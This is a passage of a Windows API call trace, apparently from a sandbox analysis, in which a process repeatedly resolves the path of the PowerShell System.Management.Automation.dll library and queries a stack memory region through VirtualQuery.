	[0285.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.724] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.724] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16baf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.725] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.725] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16baf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.727] VirtualQuery (in: lpAddress=0x16bdd0, lpBuffer=0x16cc90, dwLength=0x30 | out: lpBuffer=0x16cc90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.730] VirtualQuery (in: lpAddress=0x16bdd0, lpBuffer=0x16cc90, dwLength=0x30 | out: lpBuffer=0x16cc90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.733] VirtualQuery (in: lpAddress=0x16bdd0, lpBuffer=0x16cc90, dwLength=0x30 | out: lpBuffer=0x16cc90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.734] VirtualQuery (in: lpAddress=0x16bdd0, lpBuffer=0x16cc90, dwLength=0x30 | out: lpBuffer=0x16cc90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.734] VirtualQuery (in: lpAddress=0x16b4c0, lpBuffer=0x16c380, dwLength=0x30 | out: lpBuffer=0x16c380*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.734] VirtualQuery (in: lpAddress=0x16b550, lpBuffer=0x16c410, dwLength=0x30 | out: lpBuffer=0x16c410*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.734] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.735] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
